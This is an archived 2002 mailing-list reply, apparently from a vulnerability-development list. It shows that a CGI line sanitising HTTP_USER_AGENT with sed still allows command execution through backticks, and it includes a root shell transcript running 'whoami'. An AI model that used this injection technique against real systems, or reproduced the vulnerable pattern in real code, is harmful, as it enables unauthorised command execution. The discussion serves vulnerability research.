On Mon, 18 Nov 2002, you wrote: > Thanks to everyone who replied regarding my attempts > to stuff shell commands into this line: > > > ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"` Obviously I can't speak authoratively here... I mean the ueber-skilled team vuln-dev people who are payed to do this sort of thing may have top-secret zero-day reasons why this might not work.... but hey it worked for me. [root@localhost lib]# export LAME=""whoami"""" [root@localhost lib]# `echo "$LAME" | sed "s#\;##g"` root [root@localhost lib]# wh00pz - lookz like command execution to me In case you didn't realise - it'z the ` and ` characters around the whole expression that allowz uz command execution.... [root@localhost lib]# echo $LAME whoami [root@localhost lib]# `echo $LAME` root [root@localhost lib]# BTW - it workz fine in a shell script..... I'm sure somone has already mentioned this.... Best Regardz Brian Fury "You gonna feel the power of my move, you ready?"
This archive was generated by hypermail 2b30 : Tue Nov 19 2002 - 11:23:33 PST